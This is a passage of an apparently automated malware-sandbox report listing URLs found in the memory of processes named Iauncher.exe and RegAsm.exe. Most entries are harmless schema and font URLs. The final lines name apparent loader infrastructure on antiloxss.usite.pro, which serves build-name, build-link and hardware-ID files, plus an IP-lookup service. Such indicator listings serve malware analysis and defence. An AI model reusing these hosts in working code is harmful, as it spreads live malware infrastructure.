                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/video/
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000029C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtd
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtt-
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtd
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtt-
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtd
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtt-
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txt
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txtd
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/hwid.txt
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/hwid.txtd
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/z-Closing.txt
                          Source: Iauncher.exe, Iauncher.exe, 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
